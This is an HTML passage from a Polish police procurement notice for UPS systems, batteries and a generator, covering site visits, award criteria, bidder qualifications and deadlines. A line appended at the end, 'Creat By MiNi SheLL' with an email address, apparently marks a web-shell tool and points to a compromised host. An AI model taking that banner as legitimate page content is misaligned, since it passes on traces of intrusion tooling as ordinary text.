osobowe bezpośrednio lub pośrednio pozyskał w celu ubiegania się o<br/>niniejsze zamówienie złożone w załączniku nr 1 do SWZ – formularz ofertowy.<br/>13. Zamawiający wymaga aby Wykonawca uwzględnił sposób realizacji przedmiotu zamówienia tak aby nie tworzyć<br/>ograniczeń w dostępności do niego osobom niepełnosprawnym, w myśl art. 100 ustawy z dnia 11.09.2019 roku Prawo<br/>zamówień publicznych oraz ustawy z dnia 19.07.2019 roku o zapewnianiu dostępności osobom ze szczególnymi<br/>potrzebami.<br/>14. Wizja lokalna: Na podstawie art. 131 ust. 2 pkt. 1 uPzp, Zamawiający wymaga odbycia przez Wykonawcę wizji lokalnej<br/>obiektów. Obligatoryjna wizja lokalna obiektu odbędzie się: dla zadania nr 1: KMP Jastrzębie Zdrój w dniu: 01.09.2022r. o<br/>godzinie 09.00, dla zadania nr 2: KPP Lubliniec w dniu: 02.09.2022r. o godzinie 02.09.2022r. Miejsce zbiórki: Wejście<br/>główne KMP Jastrzębie Zdrój, KPP Lubliniec.<br/>Zamawiający prosi o potwierdzenie przybycia w celu odbycia wizji lokalnej za pośrednictwem platformy zakupowej.<br/>Zamawiający informuje, iż brak uczestnictwa w wizji lokalnej wnosi negatywne skutki dla Wykonawcy w postaci odrzucenia<br/>oferty na podstawie art. 226 ust. 1 pkt 18 ustawy Prawo zamówień publicznych. Potwierdzenie odbycia wizji lokalnej<br/>Wykonawca zobligowany jest załączyć do oferty. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31120000-3 - Generatory</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">35 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja na agregat prądotwórczy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający ustala następujące warunki udziału w postępowaniu odpowiednio w zakresie:<br/>1.4. Zdolności technicznej lub zawodowej<br/>w zakresie posiadanego doświadczenia: Zamawiający żąda, aby Wykonawca udowodnił, że wykonał w okresie ostatnich 3<br/>lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie minimum jedną porównywalną do udzielanego<br/>zamówienia dostawą polegającą na dostawie dostawy systemu zasilania gwarantowanego o wartości co najmniej:<br/>a) dla zadania nr 1: 120 000,00 zł brutto;<br/>b) dla zadania nr 2: 70 000,00 zł brutto.<br/>Przez jedną dostawę Zamawiający rozumie dostawę zrealizowaną jednorazowo w ramach jednej umowy lub realizowaną<br/>obecnie z tym, że wartość już zrealizowanej części musi wynosić co najmniej:<br/>a) dla zadania nr 1: 120 000,00 zł brutto;<br/>b) dla zadania nr 2: 70 000,00 zł brutto.<br/>Zamawiający informuje, iż porównywalne dostawy nie oznaczają dostaw takich samych lub identycznych, ale jedynie, że<br/>stopień skomplikowania wykonanych dostaw był pod względem technicznym lub organizacyjnym na takim samym poziomie,<br/>stopniu trudności ich wykonania co przedmiot zamówienia.<br/>UWAGA!!!! Na podstawie art. 117 ustawy Pzp Zamawiający określa warunki udziału w postępowaniu dla Wykonawców<br/>wspólnie ubiegających się o zamówienie, o których mowa w art. 58 ustawy Pzp. Wykonawcy wspólnie ubiegający się o<br/>zamówienie (np. konsorcjum, spółki cywilne). Wykonawca spełni warunek udziału w postępowaniu, jeżeli w przypadku<br/>Wykonawców ubiegających się wspólnie o udzielenie zamówienia (np. konsorcjum) co najmniej jeden podmiot posiada<br/>wymagane doświadczenie (jeden lub każdy z podmiotów musi indywidualnie posiadać wymagane doświadczenie).<br/>Zamawiający nie uzna za spełnienie warunku udziału w postępowaniu, jeżeli Wykonawca zsumuje potencjały wszystkich<br/>członków konsorcjum.<br/>W przypadku składania oferty na więcej niż jedno zadanie, Zamawiający uzna warunek za spełniony, jeżeli Wykonawca<br/>wykaże się tą samą dostawą niezależnie od ilości zadań, na które składa ofertę. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca na wezwanie<br/>Zamawiającego i w terminie przez niego wyznaczonym składa podmiotowe środki dowodowe:<br/>1.2.1 w zakresie braku podstaw wykluczenia, o których mowa w art. 7 uOBN-U, art. 108 ust. 1 pkt 1-4 i 6 uPzp – oświadczenia o<br/>aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, złożone zgodnie z załącznikiem nr 6<br/>do SWZ.<br/>1.2.2 w zakresie braku podstaw wykluczenia, o których mowa w art. 109 ust. 1 pkt 4 uPzp –odpisu lub informacji z Krajowego<br/>Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, sporządzonych nie wcześniej niż 3 miesiące<br/>przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>1.2.3 weryfikacji braku zaistnienia podstawy wykluczenia, o której mowa w art. 7 ust. 1 uOBN-U w stosunku do wykonawcy<br/>zamawiający dokona za pomocą wszelkich dostępnych podmiotowych środków dowodowych. Podmiotowym środkiem dowodowym<br/>służącym wykazaniu braku podstaw do wykluczenia na podstawie art. 7 ust. 1 ww. ustawy przykładowo może być: oświadczenie<br/>własne wykonawcy o braku postaw do wykluczenia na ww. podstawie prawnej, odpis lub informacja z KRS lub CEIDG, roczne<br/>skonsolidowane sprawozdanie finansowe albo jego część, sprawozdanie zarządu z działalności jednostki albo jego część,<br/>informacja z Centralnego Rejestru Beneficjentów Rzeczywistych, informacja z wykazów określonych w rozporządzeniu 765/2006 i<br/>rozporządzeniu 269/2014, a także informacja z listy rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, lista osób i podmiotów objętych sankcjami, prowadzona przez ministra Spraw Wewnętrznych i Administracji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca na wezwanie Zamawiającego i w terminie przez niego wyznaczonym składa podmiotowe środki dowodowe:<br/>1.2.4 w zakresie spełnienia warunku zdolności technicznej i zawodowej – wykazu dostaw wykonanych, a w przypadku świadczeń<br/>powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały<br/>wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy zostały wykonane lub są wykonywane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>dostawy zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z<br/>przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń<br/>powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie<br/>powinny być wystawione w okresie ostatnich 3 miesięcy. Wykaz dostaw stanowi załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Przedmiotowe środki dowodowe<br/>2.1 Zamawiający wymaga złożenia wraz z ofertą:<br/>2.1.1. karty produktu, specyfikacje techniczne potwierdzające zgodność oferowanych dostaw z wymaganiami, cechami lub<br/>wymaganiami związanymi z realizacją zamówienia dla zasilaczy UPS.<br/>2.1.2. karty produktu, specyfikacje techniczne potwierdzające zgodność oferowanych dostaw z wymaganiami, cechami lub<br/>wymaganiami związanymi z realizacją zamówienia dla akumulatorów.<br/>2.1.3. karty produktu, specyfikacje techniczne potwierdzające zgodność oferowanych dostaw z wymaganiami, cechami lub<br/>wymaganiami związanymi z realizacją zamówienia dla agregatu prądotwórczego.<br/>Zamawiający wymaga złożenia wraz z ofertą przedmiotowych środków dowodowych w przypadku zaoferowania rozwiązań<br/>równoważnych w stosunku do opisywanych przez Zamawiającego, w postaci: opisu i typu zastosowania technologii<br/>(systemów) oraz dołączyć dowody dokumentujące podstawowe parametry techniczne i analizę porównawczą, z których<br/>jednoznacznie wynikało będzie, że są one w pełni równoważne do technologii (systemu), wskazanych w dokumentacji<br/>postępowania. W przypadku, gdy zaproponowane systemy równoważne powinny posiadać wymagane prawem świadectwa,<br/>certyfikaty, Wykonawca dołączy je do oferty. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Przedmiotowe środki dowodowe<br/>2.1 Zamawiający wymaga złożenia wraz z ofertą:<br/>2.1.1. karty produktu, specyfikacje techniczne potwierdzające zgodność oferowanych dostaw z wymaganiami, cechami lub<br/>wymaganiami związanymi z realizacją zamówienia dla zasilaczy UPS.<br/>2.1.2. karty produktu, specyfikacje techniczne potwierdzające zgodność oferowanych dostaw z wymaganiami, cechami lub<br/>wymaganiami związanymi z realizacją zamówienia dla akumulatorów.<br/>2.1.3. karty produktu, specyfikacje techniczne potwierdzające zgodność oferowanych dostaw z wymaganiami, cechami lub<br/>wymaganiami związanymi z realizacją zamówienia dla agregatu prądotwórczego.<br/>Zamawiający wymaga złożenia wraz z ofertą przedmiotowych środków dowodowych w przypadku zaoferowania rozwiązań<br/>równoważnych w stosunku do opisywanych przez Zamawiającego, w postaci: opisu i typu zastosowania technologii<br/>(systemów) oraz dołączyć dowody dokumentujące podstawowe parametry techniczne i analizę porównawczą, z których<br/>jednoznacznie wynikało będzie, że są one w pełni równoważne do technologii (systemu), wskazanych w dokumentacji<br/>postępowania. W przypadku, gdy zaproponowane systemy równoważne powinny posiadać wymagane prawem świadectwa,<br/>certyfikaty, Wykonawca dołączy je do oferty. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. W przypadku wspólnego ubiegania się o zamówienie Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>3. Do oferty należy załączyć pełnomocnictwa do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia, ewentualnie umowę o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo.<br/>4. Do oferty należy załączyć załącznik nr 8 do SWZ – oświadczenie wynikające z art. 117 ust. 4 uPzp.<br/>5. Do oferty należy załączyć załącznik nr 4 do SWZ – oświadczenie dotyczące wykluczenia i spełnienia warunków udziału w<br/>postępowaniu.<br/>6. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie.<br/>7. W przypadku wspólnego ubiegania się przez Wykonawców o udzielenie zamówienia dokumenty i oświadczenia<br/>wskazane w sekcji VIII pkt. 1.1.1 oraz pkt. 1.2.1 składa każdy z Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający dopuszcza możliwość dokonania zmiany postanowień umowy w stosunku do treści oferty, na podstawie<br/>której dokonano wyboru Wykonawcy w przypadku:<br/>a) zmiany stawki podatku od towarów i usług;<br/>b) terminu realizacji;<br/>c) zmiany nazwy handlowej / nazwy bądź oznaczenia towaru przedmiotu zamówienia, z zastrzeżeniem utrzymania<br/>parametrów przedmiotu umowy wskazanych w ofercie;<br/>d) zmiany towaru dostarczanego w przypadku, gdy przestanie być produkowany; w przypadku takiej zmiany Wykonawca<br/>zobowiązany jest uzyskać akceptację Zamawiającego oraz udokumentować, że produkt wskazany w ofercie jest<br/>niedostępny na rynku, a produkt, który proponuje jest równoważny, bądź lepszy od dotychczas dostarczanego<br/>z jednoczesnym zachowaniem niezmienności cen;<br/>e) zmian ilościowych i asortymentowych z zastrzeżeniem, iż zmiany nie mogą spowodować przekroczenia wartości łącznej<br/>wynagrodzenia za realizację przedmiotu umowy; <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-25 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://slaska-policja.eb2b.com.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-25 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com